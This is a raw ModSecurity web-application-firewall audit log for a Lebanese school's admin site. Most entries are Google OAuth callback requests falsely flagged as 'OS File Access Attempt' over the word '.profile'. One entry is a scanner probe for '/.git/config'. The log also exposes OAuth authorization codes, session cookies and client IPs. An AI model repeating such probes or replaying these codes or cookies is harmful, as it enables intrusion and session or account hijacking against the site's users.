/administration/index.php?code=4/0AVMBsJjTUZIhR35elZOM0zTD_tAO2UTiKorVy8ZednYwREGMcGz54dCOyFoBubgISYejBQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=t8rj790ld7d9fag2q0h9kflb80 --2569ab2f-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --2569ab2f-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH3oFooLYw4or2LgWLGbgAAAME"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348000308278 443698 (- - -) Stopwatch2: 1753348000308278 443698; combined=4682, p1=572, p2=3703, p3=209, p4=61, p5=137, sr=165, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2569ab2f-Z-- --365c3c7e-A-- [24/Jul/2025:12:06:47.532943 +0300] aIH3p0dutIOpb_kg22jUqwAAAAs 212.28.242.188 52956 127.0.0.1 7081 --365c3c7e-B-- GET /administration/index.php?code=4/0AVMBsJgHeq3KP6P3H4yBCsTwrJb52tTN4DARNScaavAe1wIC5xWTwBXIJvEATjIdKmKU4Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-fetch-dest: document user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 referer: https://accounts.google.com/ sec-fetch-site: cross-site sec-fetch-mode: navigate accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i accept-encoding: gzip, deflate, br cookie: PHPSESSID=p6u03qkr0h69qfcdbmiebno1h7 --365c3c7e-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --365c3c7e-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH3p0dutIOpb_kg22jUqwAAAAs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348007107070 426011 (- - -) Stopwatch2: 1753348007107070 426011; combined=4791, p1=595, p2=3663, p3=222, p4=157, p5=154, sr=139, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --365c3c7e-Z-- --9fd8425c-A-- [24/Jul/2025:12:07:07.995877 +0300] aIH3u1ooLYw4or2LgWLHOQAAAMk 212.28.242.188 45546 127.0.0.1 7081 --9fd8425c-B-- GET /administration/index.php?code=4/0AVMBsJidsIkMCZkXlP2xQlYduWTtdICA1P_No7bVe_Ea-awZFM0a3hNDZyxJ6YP2ytnu8Q&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=t8rj790ld7d9fag2q0h9kflb80 --9fd8425c-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --9fd8425c-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH3u1ooLYw4or2LgWLHOQAAAMk"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348027710482 285564 (- - -) Stopwatch2: 1753348027710482 285564; combined=4668, p1=574, p2=3733, p3=115, p4=105, p5=141, sr=162, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --9fd8425c-Z-- --8d895536-A-- [24/Jul/2025:12:09:58.348429 +0300] aIH4ZVooLYw4or2LgWLLBgAAAMY 212.28.242.188 32938 127.0.0.1 7081 --8d895536-B-- GET /administration/index.php?code=4/0AVMBsJjj5-DK6gXbX_gP1vQpelvcMxLh71L9YGQSKTmdCRdjmpw4lzqhR3lhjKjcohTzCA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=vcssc934i4vhgfu8vs74t6is75 --8d895536-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --8d895536-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH4ZVooLYw4or2LgWLLBgAAAMY"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348197905415 443154 (- - -) Stopwatch2: 1753348197905415 443154; combined=5764, p1=681, p2=4754, p3=156, p4=61, p5=112, sr=185, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d895536-Z-- --8d67f508-A-- [24/Jul/2025:12:11:10.046137 +0300] aIH4rRukk8cgt8UnU9qHnwAAAFA 212.28.242.188 50930 127.0.0.1 7081 --8d67f508-B-- GET /administration/index.php?code=4/0AVMBsJgLas93CkAOzra2GXB6QycplOPxclsiyGikMq4nrw3m-kGCluBGnhphVNXfm5Uqlg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-GB,en-US;q=0.9,en;q=0.8 priority: u=0, i cookie: PHPSESSID=n1bge5fhsbkvhbirek697od403 --8d67f508-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --8d67f508-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH4rRukk8cgt8UnU9qHnwAAAFA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348269604071 442259 (- - -) Stopwatch2: 1753348269604071 442259; combined=5260, p1=635, p2=4292, p3=139, p4=60, p5=134, sr=186, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8d67f508-Z-- --d89de220-A-- [24/Jul/2025:12:11:50.838862 +0300] aIH41hukk8cgt8UnU9qItwAAAEA 195.112.198.68 54130 127.0.0.1 7081 --d89de220-B-- GET /administration/index.php?code=4/0AVMBsJjEycfRDjA0kBuuqvTTMpb8ZRuItsOgoSHi4Kvf2a-d2YgBr2G08qthle7M6ILyIg&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 195.112.198.68 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 accept-language: en-US,en;q=0.5 accept-encoding: gzip, deflate, br, zstd referer: https://accounts.google.com/ upgrade-insecure-requests: 1 sec-fetch-dest: document sec-fetch-mode: navigate sec-fetch-site: cross-site sec-fetch-user: ?1 priority: u=0, i cookie: PHPSESSID=hvva38ip8a44f1aatti7dtm5l1 --d89de220-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --d89de220-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH41hukk8cgt8UnU9qItwAAAEA"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348310414391 424621 (- - -) Stopwatch2: 1753348310414391 424621; combined=5204, p1=627, p2=4184, p3=191, p4=62, p5=139, sr=160, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --d89de220-Z-- --1044e55d-A-- [24/Jul/2025:12:14:00.188419 +0300] aIH5WBukk8cgt8UnU9qM8AAAAE8 3.14.254.96 47758 127.0.0.1 7081 --1044e55d-B-- GET /.git/config HTTP/1.0 Host: sys.ellaith.com X-Real-IP: 3.14.254.96 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --1044e55d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Set-Cookie: csrf_cookie_name=5d5f8fdc3cf537242b17ecb1a3de1e11; expires=Thu, 24 Jul 2025 10:15:00 GMT; Max-Age=3660; path=/; HttpOnly; SameSite=Lax Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --1044e55d-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "sys.ellaith.com"] [uri "/.git/config"] [unique_id "aIH5WBukk8cgt8UnU9qM8AAAAE8"] Apache-Handler: proxy:unix:/var/www/vhosts/system/sys.ellaith.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348440116693 71833 (- - -) Stopwatch2: 1753348440116693 71833; combined=3034, p1=610, p2=2312, p3=0, p4=0, p5=112, sr=176, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --1044e55d-Z-- --cba48802-A-- [24/Jul/2025:12:17:44.687209 +0300] aIH6OBukk8cgt8UnU9qSuwAAAEE 90.214.236.66 35788 127.0.0.1 7081 --cba48802-B-- GET /administration/index.php?code=4/0AVMBsJgoNdhMEW5IEjNsnBaZAWi218icw_mjfxbAgn4qUWyzOu2lMY1NENVSZW-tEe4AMA&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=2&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: www.jinansystem.com X-Real-IP: 90.214.236.66 X-Accel-Internal: /internal-nginx-static-location Connection: close accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 sec-fetch-site: cross-site sec-fetch-dest: document accept-language: en-GB,en;q=0.9 sec-fetch-mode: navigate user-agent: Mozilla/5.0 (iPhone; CPU iPhone OS 18_5_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/138.0.7204.156 Mobile/15E148 Safari/604.1 referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br cookie: PHPSESSID=4si7jul0je8q8g6gu2hiq0u3m5 --cba48802-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3676 Content-Type: text/html; charset=UTF-8 --cba48802-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||www.jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "www.jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIH6OBukk8cgt8UnU9qSuwAAAEE"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753348664223926 463484 (- - -) Stopwatch2: 1753348664223926 463484; combined=5006, p1=584, p2=4038, p3=153, p4=81, p5=149, sr=172, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cba48802-Z-- --fb13d031-A-- [24/Jul/2025:12:24:16.453874 +0300] aIH7vxukk8cgt8UnU9qbqwAAAFU 212.28.242.188 54904 127.0.0.1 7081 --fb13d031-B-- GET /administration/index.php?code=4/0AVMBsJhax_rnznCG62GQM0gDv6gpilk-AF02rPp2LexGT2H48g4_FP338uZKkN2D-DG4CQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Microsoft Edge";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 Edg/138.0.0.0 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i 